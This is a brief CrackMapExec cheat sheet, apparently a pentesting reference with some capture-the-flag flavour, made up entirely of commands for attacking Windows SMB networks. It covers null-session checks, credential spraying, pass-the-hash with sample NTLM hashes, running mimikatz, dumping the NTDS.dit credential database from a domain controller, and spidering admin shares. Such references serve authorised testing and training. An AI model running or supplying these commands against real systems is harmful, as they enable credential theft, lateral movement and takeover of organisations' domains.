Crackmapexec
# Usage:
crackmapexec smb 192.168.1.1/24
# NULL Sessions
crackmapexec smb <target(s)> -u '' -p ''
# Checking auth
crackmapexec smb 192.168.1.1/24 -u CoolAdmin -p ARealGoodPassword
# Passing the hash
crackmapexec smb 192.168.1.1/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
# Running Modules
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 -M mimikatz
# Enumerate shares
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 --shares
# Enumerate domain users
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
# Authentication + Checking Credentials (Domain)
# Failed logins result in a [-]
# Successful logins result in a [+] Domain\Username:Password
# User/Hash - Pass the HASH after obtaining credentials such as
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::
#You can use both the full hash or just the nt hash (second half)
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
# Continue to crack users and passwords
cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
# Dump the NTDS.dit file from target DC from secretsdump.py
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
# Spider C:\ drive with txt in the name. This will search for user.txt and usertxt.html. The $ must be escaped
cme SMB 10.10.10.178 -u USER -p PASSWORD --spider C\$ --user txt
# Mimikatz module
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug' References:
Last updated